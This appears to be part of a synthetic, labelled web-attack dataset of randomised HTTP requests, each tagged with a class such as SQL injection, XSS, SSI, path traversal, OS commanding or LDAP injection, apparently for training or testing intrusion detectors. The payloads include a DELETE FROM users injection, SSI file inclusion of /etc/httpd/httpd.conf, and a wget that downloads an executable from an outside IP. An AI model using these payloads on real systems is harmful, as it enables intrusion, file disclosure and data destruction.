Max-Forwards: 5921
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic bjRlZTpmaXR3cG0=
Authorization: aieon agLsomy=lader
Range: 4-,650706-6695,41362-
Referer: /tspe/cwms/w0nsP.shtml
TE: trailers,gzip;q=0.6
Trailer: Accept-Language
User-Agent: Mozilla/4.7 (Machintosh; U; PPC Mac OS X 3.5; Ek-ds; rv:5.0.6) Gecko/52272496
Via: dvno/1.0 86.196.236.183:4835, 7.5 www.lFfj2wd.gif:95150, 1.7 www.xocUi.html
Transfer-Encoding: identity
Upgrade: d5det/1.1
X-Forwarded-For: 163.247.165.107
X-Serial-Number: 6227960024150
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49648
Start - Id: 35235
class: SqlInjection
GET /bXkt-NPh3pfee/neaeemhipp/BcBBkLuO7/enemmI/hQ6fovmD4cGirmRY8QZ/Ne5eaSmeetdsaaDu2b3/ooDtC/qtene8jenhaiCwo/tfrmqDnBZQkH/wgetZA/V0yQ@.cgi?meTw=e&nr=%27++++OR++%27rpjrsEl%27+++%3D+N%27+&9ea9U9d=eeli4sr&W@RZ=eueZqeBUEeQ- HTTP/1.0
Host: www.Rofhttalvs.be
Connection: 5rwmR2
Accept: video/*;q=0.7, image/*, text/plain
Accept-Charset: cp-936;q=0.8, x-mac-arabic, iso-8859-5;q=0.1
Accept-Encoding: *
Accept-Language: e-rvf, lf-tsEbb, r-nsymned
Cache-Control: max-age=003
Client-ip: 61.19.198.20
Cookie: sgv9d6cmnd=swci4syii;dhmooo=9319656;bwstcno=exi
Cookie2: $Version="55"
Date: Mon, 14 May 07 20:58:38 GMT
ETag: "rHuQDmKzfY2ZnTLVvsn7"
Expect: 100-continue
From: oeeetot@ecjsbsx.org
If-Modified-Since: Sat, 15 Mar 08 03:54:00 GMT
If-Unmodified-Since: Sat, 14 Nov 09 10:32:54 GMT
If-Match: *
If-None-Match: "FrM9gcMispPKjG-cy"
If-Range: Fri, 17 Jul 09 18:09:18 GMT
Max-Forwards: 1595
MIME-Version: 1.1
Pragma: cusnt=cde0tptk
Proxy-Authorization: Basic UmxkaXJ0OjNlaXU=
Authorization: Basic eHJjZXJlQ0U6b2VoTm9w
Range: -5631,75-
Referer: http://rolma.it/bhxnse/ooNg/deeeeMEz/I8un9ne/wn0Wnxi.asp
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/4.9 (X11; U; Unix 3.4; sa-nb; rv:7.7.4) Gecko/71028144
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 0.5 www.aiom.js, peI/9.7 www.eleett.jpeg:7, FTP/1.7 5.145.27.180:51704
Transfer-Encoding: i7ohtu
Upgrade: doyt/0.4, bE3yw/1.4, otunr5/6.9, 62V/0.3, trd9ad/7.6
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 253.219.42.72
X-Serial-Number: 514695691907
----: -----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35235
Start - Id: 47276
class: XSS
GET /rzX3ZeVVT8LDdOi/VPopta/ao7/3hmnrr/b8g89w/aiise5sknJoRntotrl/gfBwLM.Qp/ida1/eBht.PpTO5/teesihbYOlt1hhW5mBtc/tK7Wc5H1nK7sXhAkAzE/l1eQ9q.cgi?a0ly9njZefrhn0s=%3C%21--+--+--%3E%3Cscript+%3E%5Balert++%28%27t9ti%27%29%3B%5D%3C%2Fscript+++%3E%3C%21--+--+--%3E&8t6ti=iotnaoe08e8a3c&94ndee=aef0 HTTP/1.0
Host: www.esioruas0n.de
Connection: oneHswsR
Accept: */*;q=0.2
Accept-Charset: hz-gb-2312;q=0.5, x-mac-korean;q=0.5, euc-jp
Accept-Encoding: *;q=0.7
Accept-Language: 3iye7tqs-i;q=0.6, lsi05h-ceYhsth, N-0Tsd;q=0.1
Cache-Control: m=YseoA
Client-ip: 48.5.47.91
Cookie: hjesnneac6=965106;is=7669071717;ihitD2zeaoyf7ea=uln?;sr=uShe2ttHNseso;5HfeoiEmdumpn1e=84
Cookie2: $Version="73"
Date: Sat, 18 Feb 06 18:41:58 GMT
ETag: W/"rXrXQIss2Diq7_2DXw"
Expect: eplnt
From: eA3ce@Sdytnl.st
If-Modified-Since: Fri, 02 Jul 04 16:43:12 GMT
If-Unmodified-Since: Thu, 12 Jul 07 06:56:10 GMT
If-Match: *
If-None-Match: "2FfkPzTGdUdeeoTP"
If-Range: Mon, 16 Oct 06 12:24:16 GMT
Max-Forwards: 98
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM YWFmOHNyYThLaGRuZGhpbTRlRWVybmU5bnJGNWFveGNwbDli
Authorization: Digest realm
Range: 3-25949,-0524
Referer: http://www.ruoyhr.org/jrnguu.nsf
TE: trailers,deflate;q=0.7,chunked;q=0.0
Trailer: Trailer
User-Agent: Mozilla/2.7 (Machintosh; U; PPC 7.3; qi-sd; rv:0.6.1) Gecko/05630198
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 581x8741
Via: 9.5 216.91.65.162
Transfer-Encoding: deflate
Upgrade: enoe/1.7, jmbut/1.3, oeda/2.9, euyr2/9.2, lnTo/7.5
Warning: 431 www.otzeN.jpeg "hOuJne9h" "Sun, 21 Feb 10 07:26:32 UTC"
X-Forwarded-For: 228.59.131.84
X-Serial-Number: 972806638968754
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47276
Start - Id: 35105
class: SqlInjection
GET /msriapt/iyn4/b-1XFv/ejhiel1/dd/j3yicNlc/q4/VIcFWVbodyv/thoeba/9yf/84QhIcMXv--EX/9nprNkrGIo336GanOt.css?2roo=Illr&onreeTeii1=ipK&snati=738&eeyhie9Shtooe=Ese9Srdbinyed&SSieb=eofeitwihecwo&sXehrOTza=8&dopoU4l=m4sw&etewdhe3drnttea=gx-Uhpnv7q0&98raqsilarz7s=in4oxmlm%3Dietrid%3DPu9A&6replacesg=086867&nsnut=tls59telnetilo%2FYac&mnkthtcua=7e3o&5eoehaa=o4CUbG&osSatiiO=q%24&WlHH1@YVA4v=3eechol%25A+rtpasswd HTTP/1.0
Host: 9.169.70.232
Connection: keep-alive
Accept: image/png;q=0.4, video/*;q=0.5, audio/basic
Accept-Language: oeuycxan-ii1mnl, lono-Nrl, aRepehbs-0qo;q=0.9, irReeeyo-mnOU;q=0.3
Cache-Control: min-fresh=31899
Cookie: oce6EeoIza=padminjmnmpela ;ecnaipttson0n=55737;xbjuJJ@mpasswdgroup by7=pyt)1Ecat;aaghmaafr9e=iLvWHqEFSD;iOageoiic9o=rfpHx'    );DELETEFROMusersWHEREupper(username) =upper(    'admin
From: tTr0@lIe8cdv.be
If-Modified-Since: Wed, 19 Jul 06 13:52:05 GMT
If-Match: *
If-Range: Sun, 09 May 04 04:35:55 UTC
Max-Forwards: 44
Authorization: NTLM RkxjRWJuYW9yWnB0RWE4Nk5ydGVyczNscm5zTm5lcGxubXpObg==
Range: 1474-,6761-8
Referer: http://heitieed.st/nan7.pdf
User-Agent: Mozilla/3.5 (X11; U; SunOS sun4u 8.4; l7-ro; rv:5.1.3) Gecko/00825551
UA-Pixels: 6369x980

null

End - Id: 35105
Start - Id: 48358
class: XPathInjection
GET /8bBB5fab9DWCUF/oe/uesbdi8ifyldkor/ZunionATzqU8.Pn/c_N_yxpnph-oBRNAV8/urawef4/B.XJJ_cwot.jpg?doas=763384&np=60&G@samd=s+zoa+%28w3uc%3Ellm&hrrelstmnm=uGYdly5tr&eld7ua=pservicesesrpr&GjD8HJHxmlb6=%3Ct%2Ft5binput0To5dio&lunensren1=024561&e9io4ibnHeinq4=dr&beieRtius=767921693&26r7fst9bE0i=secopy1oAb7&oldn3l=9ZP&wMs2cpilOysytau=fhhle&lidg29pleeein8=rsniq%24b6%26&r25n=rsa&aennea6sesheeSi=en5M2Mtlp HTTP/1.0
Host: www.exewnenofo.it:48274
Connection: olet
Accept: */*;q=0.8
Accept-Charset: windows-1252, x-mac-cyrillic;q=0.1, x-mac-chinesesimp;q=0.9, x-mac-korean;q=0.7, macintosh;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: (i  <  count(eramx/child::text())     and     j   <  count(htujbu/child::comment()) and k   <   count(iud/child::*)    )
Cache-Control: max-stale=92
Client-ip: 107.146.131.163
Cookie: a1adtNn=sdXL70fS4_s;ei=01611680
Cookie2: $Version="8"
Date: Thu, 15 Mar 07 19:05:56 GMT
ETag: W/"DiaYz0AA1cS12qGseo"
Expect: 100-continue
From: o7ey@teavftoi.com
If-Modified-Since: Tue, 29 Jun 04 04:26:19 GMT
If-Unmodified-Since: Mon, 18 Jul 05 02:31:43 CET
If-Match: "lfss7w-WDb6lCXMWi.F"
If-None-Match: *
If-Range: *
Max-Forwards: 874
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: nya1hs uees=eeteostl
Authorization: idn2 t3g6oh4=t46e
Range: 77-2889,6-
Referer: /7wmtwhtE/myeiy2if/aG0S/gtuhnhE.asmx
TE: trailers
Trailer: Accept-Language
User-Agent: yeagter/5.3
UA-Color: color32
UA-Pixels: 784x5970
Via: motuc/5.2 169.45.209.141:44330, 7.9 www.eghaUoqD.css
Transfer-Encoding: identity
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 152.22.134.108
X-Serial-Number: 2527900
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48358
Start - Id: 39301
class: SSI
GET /F9uwc5GCNRE/siHQMua_FJg2T/r4lNL29LoE_QspArY8i/p1JEselectQ/4ehKtoufE/tnk53iyagexocaone/reAnstkrxi9sctht/h4vg74MRWhc8Sb2bpr6w.exe?eilse5mrgamee=1&igEiomucNa=nli52eval9&NcspEgmpNreu5eR=16&len2enNnlq2mrsf=046592&BoelbeyouRodgvR=%25o&gihna=ltnhea2y&ss6G1hr6dh=%3C%21--%23email+fromhost%3D%22www.mtlwrahu.com%22+tohost%3D%22mailbox.n8aEe.com%22+message%3D%22nejIxa+aeyciRz+amELphn+37eep%22+fromaddress%3D%22Qsat.com%22+toaddress%3D%22ta5.ke3ei.com%22+subject%3D%22e%22+sender%3D%22e8a.com%22+replyto%3D%22Scantxf.com%22+cc%3D%22ra%22+inreplyto%3D%22rsd+nE6+lt%22+id%3D%22iomail%22+--%3E&jscriptbUS8@QJm=nsd&ohlsc9nmae=1atewa+nam3ueoiso&iolti4aueNemli=foiseneT8jntn&9ilYhtpassbFmnL=4796626&oafszhuorn=7213930&dhs0id=896181 HTTP/1.0
Host: www.elnSAt4i.com:8528
Connection: U3teaG3a
Accept: */*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.3
Accept-Language: dn-ERh, fye-7eOsrOm;q=0.6, Osnhu-h;q=0.6
Cache-Control: max-age=9507
Client-ip: 180.188.213.194
Cookie: Ezr1oucharsmi=fsybn
Cookie2: $Version="6"
Date: Thu, 05 Oct 06 08:43:03 UTC
ETag: W/"4Vi2jRSf4ZD2RAJS3o2e"
Expect: iGetlsru
From: unmiie@Hyivtsn.com
If-Modified-Since: Thu, 31 Jan 08 11:47:45 GMT
If-Unmodified-Since: Mon, 02 Nov 09 15:50:31 CET
If-Match: ".RSkPz.zwDpvQWLClqcu"
If-None-Match: "vQH4RvlWOIqenGpkp"
If-Range: Fri, 12 Jan 07 11:09:42 UTC
Max-Forwards: 8
MIME-Version: 6.8
Pragma: acendteT='aazbwoa4'
Proxy-Authorization: Basic N3NzZ21vbG86bnUzaQ==
Authorization: NTLM ZWhlbGFvaW5xZWpodHluaWFldW9tZWVPaW5wRXJoNGxHdHRqbnNhYTk=
Range: 9225-57239,301-8
Referer: /orBa/rlsl3te/9tunmhr/lbtr7e/idmoc.sh
TE: trailers,deflate;q=0.6
Trailer: Date
User-Agent: ieicwwp/1.5.0.5.0
UA-CPU: MIPS
UA-Disp: 646,7509,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 573x190
Via: 6.1 209.225.112.43, 6.8 www.ytmo.tiff
Transfer-Encoding: ks2h1; sdgoons=srt4ty
Upgrade: asiM/9.3
Warning: 946 74.67.255.112 "graknmaJmdafxne6c" 
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 80952053828136219
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 39301
Start - Id: 44981
class: PathTransversal
GET /Greplace/n@U-uUfIfxxx5t7S/Ul.jpg?XiWE=rns&qcvCl=0054718&vtsEoheariI=5n%25epQS0n&iaohcrq7ar=rcvz&5Jl=8195&totdvrelmoasAE=aeoreju&biNhJbigl=446&gnho=94018&ys=rNdnt+ea1ktc&JnaX=qia%26%28gao1&eizvtzoaacA8kr7=.%2F..%2F..%2F..%2F..%2F..%2F&SIyhaa=iHtddThYLeau9n9Efo&Ta3srj=1+i HTTP/1.1
Host: www.eooattte.biz
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 64.160.89.221
Cookie: nfse99=72458279;aahY=40atA5hlooO<;ycstoh9gntt=Des;ynt-it.dhZposition=Eruhscuwe4b;tiEranoaeI23=o
Cookie2: $Version="2"
Date: Mon, 13 Nov 06 24:17:40 CET
ETag: "Xe0xrZEXUIVTJ67w.0"
Expect: wpte
From: ytsw@heeaiueil.de
If-Modified-Since: Wed, 11 Aug 04 02:16:38 CET
If-Unmodified-Since: Mon, 17 Jan 05 15:03:07 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 08 Sep 05 12:13:08 UTC
Max-Forwards: 5653
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nhtuo"
Authorization: Digest algorithm=MD5
Range: 73-,999598-14093
Referer: /ifuene.php3
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/9.0 (X11; U; Solaris 0.0; ep-g0; rv:6.2.9) Gecko/65163890
UA-CPU: 68000
UA-Disp: 272,747,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: 4.8 www.jmEnbs.css:8, fH5/7.2 226.56.13.183
Transfer-Encoding: gzip
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 066 www.nilrhde.jpg "jrIghnmascnrodusoxo" "Thu, 06 Oct 05 03:19:48 UTC"
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 02029682111674011013
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44981
Start - Id: 42472
class: SqlInjection
GET /vERgZ0_aEXWDf/mt7aeuemslDwm5/jPUrd/ulenaErjdpwT/sd0o.jsp?wwhnct=6923501455&17funsIai=jMIeVeFu&3sdctg6yaea=kOD5vM&Gw8sp=51947&0tV=072013+or++id%3E6+++or++++ls_id%3C1234&drugeh=enr4ss&0dr=r&H_Sftpexec=57217148&rsv=nz+ey&chuCsISsb=update%3Enopt&bes=lwtqu4wes0ihfqw HTTP/1.0
Host: 236.150.117.79
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.4
Accept-Language: yaT9s64g-e, boet5s-muwsDhto;q=0.9, 2ang-t;q=0.1
Cache-Control: max-age=561
Client-ip: 215.204.118.143
Cookie: ehcfue=csrn
Cookie2: $Version="582"
Date: Sat, 23 Dec 06 23:44:37 CET
ETag: W/"O31nD@J3Iu0A1HEKQNyE"
Expect: 100-continue
From: sheo@RafNi.uk
If-Modified-Since: Wed, 17 Oct 07 04:41:04 GMT
If-Unmodified-Since: Sun, 13 Mar 05 03:49:30 CET
If-Match: "3jZ1Ow8wUTNQRCQS2l2"
If-None-Match: *
If-Range: Sun, 13 Sep 09 17:59:33 CET
Max-Forwards: 88
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM ZXR0dGlub0RpZjRlZTZvZTdkc2FubjZhOXRhc28ybmlhbm1vcmRueGls
Authorization: eptd iSea=snwne
Range: 909400-,77915-,-01017
Referer: /ho1cCNi/anIn/9nhrAd/9namrnl/satiE.mdb
TE: gzip,gzip,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.1 (X11; U; Open BSD i386 7.7; r5-sl; rv:3.8.7) Gecko/41855204
UA-CPU: 68000
UA-Disp: 1488,9515,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 733x829
Via: HTTP/1.2 64.160.114.64, 4.9 www.bzwpSBd.jpg, 3.2 www.zSsrwCp.htm
Transfer-Encoding: gzip
Upgrade: mc9c/0.1, Rek40w/1.3, rcow/4.1
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42472
Start - Id: 43028
class: OsCommanding
POST /Tnf5zexecxMr/cnzzB9/hx8MLgdhycoirevc/Laortui9tnN3ih/iA/htnbNseNek/nH_aDxql/cnneeup8t/hbrixatbnanmih0ut/0qlkfQV@61WWXZVhum/nNGSJuR5CYVOWEtY0.pl? HTTP/1.0
Content-Length: 213
Content-Language: etk
Content-Encoding: deflate
Content-Location: http://www.tmchiAec.de/fadanrbt/tn2sw/c2hie/uerP/rt9tn.jsp
Content-MD5: ZWJhdGxoZDJlc250Um44bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Jan 10 10:31:06 CET
Last-Modified: Fri, 06 Jun 08 07:21:36 UTC
Host: www.4arsnm.biz
Connection: close
Accept: audio/x-wav;q=0.7, audio/basic
Accept-Charset: x-mac-korean, windows-1258;q=0.1, x-mac-icelandic;q=0.6
Accept-Encoding: identity
Accept-Language: 7sl7rt-tms;q=0.8, i1yje-osshP, 9i9d-Rn3t, djiette-pG
Cache-Control: max-stale
Client-ip: 212.119.175.109
Cookie: dmngynsAyaa=mre;nuwr=37rakrtiarfqkc:A;ewoedtretblOG==te;0dBJ2pSENZVk=go;oF1NrZ=htaccesscriptscriptm
Cookie2: $Version="911"
Date: Thu, 19 Mar 09 12:13:27 UTC
ETag: W/"w9X0IN3s8wdXjUj@6M_"
Expect: 100-continue
From: 1ke4@enu9hmpEs.ch
If-Modified-Since: Sun, 22 Jun 08 13:50:00 GMT
If-Unmodified-Since: Wed, 14 Apr 10 15:40:43 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Jan 08 10:38:17 CET
Max-Forwards: 7026
Pragma: bpHyiwu=rwt
Proxy-Authorization: NTLM eGV0aXNuc29ydXBqdERwdGVpU25vMHNhbGFvYmJiemFrT2NyYWVoZWhk
Authorization: Basic MW5ydzJpOmg2cHNvNEU=
Range: -98633,070828-,-9277
Referer: http://www.iscor.ch/motl4d.exe
TE: gzip;q=0.5,deflate
Trailer: Connection
User-Agent: wrteaysge
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2695x320
Via: 1.1 www.mdlaeei.html, HTTP/8.5 76.222.119.122, HTTP/7.3 www.iuexga.tiff
Transfer-Encoding: Tydt
Upgrade: p2tir/9.7, ante/3.0, yetR/9.1, 99uamy/7.6
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.212.15.105
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eo5eEewwt=e&ia8r02l2lMa=J3ntroHSaiu&eose7lsqee5fdl=nmdeedt&to2eni=gcbondAeioDuaht&lO8oehstgnai=1I.bFo8l&oseasq7oitoDMe='     ;uftp   -g  /home/llalse/siteortrtric  78.175.8.80    /esilns  ;&ost=51805

End - Id: 43028
Start - Id: 36818
class: OsCommanding
GET /7fXvod_ABj9v/b3PNOEB6/32uasbbsvhrI11oo6mie/nYdcR/hrgpL6/cf.tiff?tk0tkte=9107301&cRojmRonisnsoOs=%5Cn++++wget++++http%3A%2F%2F214.253.116.115%3A40912%2Fnftp.exe&oMthSAot=Hirqea1No+smupdaten%3Aeobject&d2hecepyc5=49378&Eeotffceorv7po=h+y&ilm=1056&tKcopyye=ps&ehebeer61Rlse4=uaorhcmdconnectghp84l&tuseusn=Odi&4enfsktdewc=0dxemaccess_log&JgtchEpcL0=nia6ie3hnmr6ede&aetnerla=68506541&it=betweenj%2Figjtgecopy HTTP/1.0
Host: www.wn4MaL.cz:80
Connection: sklw1nh
Accept: */*;q=0.2
Accept-Charset: euc-jp, koi8, windows-1253;q=0.7, iso-8859-5;q=0.5
Accept-Encoding: deflate;q=0.0, compress;q=0.7, identity, gzip
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 72.115.188.239
Cookie: eQnMepNti8e=noeedg;dri=ooe;djbinV=ya;Vnph-K346htpass=dle
Cookie2: $Version="089"
Date: Fri, 08 Dec 06 10:49:52 CET
ETag: W/"xrA-MA9iPPdOjdqpDkPw"
Expect: 100-continue
From: snesreme@aDfeh6odeu.gov
If-Modified-Since: Thu, 08 Dec 05 08:34:18 GMT
If-Unmodified-Since: Tue, 25 Jul 06 05:04:40 CET
If-Match: "m.weT1rjei6Vefie"
If-None-Match: "C6W.OidEQqUJyGYEeEdC"
If-Range: *
Max-Forwards: 25
MIME-Version: 2.5
Pragma: t=ohoon5lo
Proxy-Authorization: Digest response="58C55118C31Bc2CeF0dbFC24cD1DCe18"
Authorization: Basic c25pb3JncjppbjFvcnRyVw==
Range: -95
Referer: http://0veruen7.net/eiej/eytta/vupi/2lm1ooc/ilo8erj.jpeg
TE: deflate;q=0.9,gzip
Trailer: If-Match
User-Agent: Ofsenivhuiaesbgsrss
UA-CPU: Sparc
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1930x9863
Via: 8.1 26.230.241.19, 9.7 www.andt.js:6584
Transfer-Encoding: identity
Upgrade: er9lae/9.7, tsv3/3.1, ouoda/7.7, rtop/0.7
Warning: 649 www.csc0sg.js "anssgt3hmn3ennroren" "Wed, 05 Dec 07 14:41:31 UTC"
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 36818
Start - Id: 38670
class: LdapInjection
GET /acelogne.pl?4kAANn=e_7Nqjs&mruon=s%2F%3Dftp%5C&e3W=tyhei%29%28+++%7C+%28st60%3D*%29&lljduhniNp8he=5&htqEWra=l%28&or1inrnh=%29+ns&AO-RBLgiperl5X=ccvU.w&2nsE72=%3Embs%7Ee%26%25uRat&7etnoRrprtnyttj=896106&haosafam95hh=6585542071&swq3na=sb1CLLbJTL&evnan6IwtroAnf=+idu&n8am=mmtdi&En0e733rnabohn=74752 HTTP/1.1
Host: 123.128.111.21:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.7, compress, compress;q=0.5
Accept-Language: *
Cache-Control: max-age=1829
Client-ip: 202.109.50.24
Cookie: z3yetcu7RyC=chterh>k;EmholsdI9be=dwU;mh=992;x9=surlaerlotlealejoT;gicnb=31391848
Cookie2: $Version="8"
Date: Fri, 16 Jan 04 24:14:48 CET
ETag: W/"O9@O-jxY9.LjYLQO"
Expect: eees1
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sat, 07 Nov 09 18:36:44 CET
If-Unmodified-Since: Fri, 18 Jan 08 09:27:09 GMT
If-Match: "rkeIlLUNvrgOuws"
If-None-Match: *
If-Range: Tue, 11 Apr 06 07:51:37 UTC
Max-Forwards: 3443
MIME-Version: 9.7
Pragma: ag=tpgaph
Proxy-Authorization: Basic ZTNpZGlzYzp0czFtb2VmYw==
Authorization: Basic ZHVlZTM0aG06ZnM4b2g=
Range: -3789,-5,300-00360
Referer: http://aoryl.uk/dhph4/te9hhr.mdb
TE: trailers
Trailer: Accept
User-Agent: tOwKu7M_Qc http://www.Thd5hp.gov
UA-Disp: 0550,3953,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7709x7356
Via: o1r/1.1 www.nhorlir.htm, FTP/1.2 85.224.226.63
Transfer-Encoding: usdn
Upgrade: anRsj/9.4, 58agtG/6.3
Warning: 198 210.170.229.105 "HreisPeNtrsDzoqe7" "Mon, 01 Jun 09 16:10:48 CET"
----: -------------------

null

End - Id: 38670
Start - Id: 39588
class: SSI
GET /eetmn3aenhseh0e/nMlaQqJ15piaY/_qdalljSeH0us5y/kilt6/eermc/osms/OemapnLolee/gkou/CysLdiUqLHTE1/iaeo/r1egel2dnoRean5eszqa/aizq.jpeg?ay5u=%3C%21--++++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&gekewnc63J0lcr=%7E%3FDetiform%3E%3D HTTP/1.0
Host: 105.129.98.158
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-2022-jp;q=0.0, iso-8859-6;q=0.7
Accept-Encoding: gzip, compress;q=0.6, compress;q=0.4, gzip;q=0.4
Accept-Language: *;q=0.6
Cache-Control: aa=anqospe
Client-ip: 139.247.11.55
Cookie: 0s8TLBtelnetX0d=0266040101
Cookie2: $Version="5"
Date: Sat, 20 Jun 09 19:05:48 CET
ETag: "YVC3VkK4ypDbvG-NGs"
Expect: etree
From: szEete@ence.uk
If-Modified-Since: Wed, 23 Sep 09 06:35:21 GMT
If-Unmodified-Since: Mon, 21 Nov 05 02:38:08 CET
If-Match: *
If-Range: "cYls4Mbt8SBIZMo"
Max-Forwards: 9843
Pragma: eeh='eInew'
Authorization: Digest realm
Range: 5591-,251722-40474
Referer: http://www.dh5ho.fr/lzg9xdWd/9ae7gms.zip
TE: gzip,trailers
Trailer: Accept-Language
User-Agent: bdstoB36inpttntnhd
UA-Disp: 779,442,32
UA-OS: Win98
Via: ltor/8.3 www.sbuSfoIf.jpg, 2.1 www.tisrQs.jpeg:2
Transfer-Encoding: eeLx
Upgrade: oshili/5.5, wen/5.9
Warning: 816 90.205.210.114 "n6wratgRHtneatUce" "Sun, 10 Jun 07 18:21:41 GMT"

null

End - Id: 39588
Start - Id: 38479
class: LdapInjection
GET /oz/2rp8yowbgr7hn4e/tS/ayp6o1fyxbN/hbaim2jotgli7le/nbDVmOHqNwk/o0/2aaenbreca.aspx?kthaocim=rThtpasseeestdinlwauihs%5D&uewuxa=ela&Gs4awvn5uNr=7in+&srghmlIb=ipel&tjs=ni%29%28++++%7C%28Niil9%3D*%29&saaiyA=ittteieeti&es=iinclude&cgrEeaenL=sn%3Fse&ltosnoecrn=26347&ersd2i=pJnVcHI4PyO&gGErtzuf=%5DaW&rehvNnni=gLqCZPntZv5&n06e=7emt2le&hdhaa=mnl3riaAAtL&dtnrtBo=0895 HTTP/1.0
Host: 201.25.120.48:80
Connection: close
Accept: */*
Accept-Charset: euc-tw;q=0.1, cp-936
Accept-Encoding: 
Accept-Language: cll-lZaas, adxaee3-0mi, rnte9v-3ni;q=0.6
Cache-Control: only-if-cached
Client-ip: 23.7.129.65
Cookie: noiatSeen=462VQqZi3wzp;prz9Lt=51852086;rrei=)yiwhereoc?risimgrt;oereD=btpkeoto
Cookie2: $Version="51"
Date: Sun, 26 Feb 06 13:45:18 GMT
ETag: W/"HdLDJ1hGjmZABeS"
Expect: stre=tmrfue
From: b8antatt@o1neid.cz
If-Modified-Since: Mon, 09 Nov 09 24:09:15 GMT
If-Unmodified-Since: Mon, 23 Mar 09 20:16:46 UTC
If-Match: "1AzPf7ID3cuZue59zjO7"
If-None-Match: *
If-Range: Fri, 27 Mar 09 18:48:59 UTC
Max-Forwards: 7
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: esla smd48=NgmS0io
Range: 410-,-7541,-488341
Referer: /dgtc3et/zmut/cpqhi.gif
TE: chunked,gzip,gzip
Trailer: Cache-Control
User-Agent: Mozilla/2.6 (Machintosh; U; PPC Mac OS X 3.2; td-51; rv:1.7.4) Gecko/95208557
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0403x7270
Via: 1.7 www.ilemwtvh.tiff, HTTP/5.1 131.93.125.246
Transfer-Encoding: gzip
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 917 www.ashesmu.htm "elta4zdhaod" "Sun, 11 Jul 04 04:27:49 UTC"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38479
Start - Id: 38796
class: LdapInjection
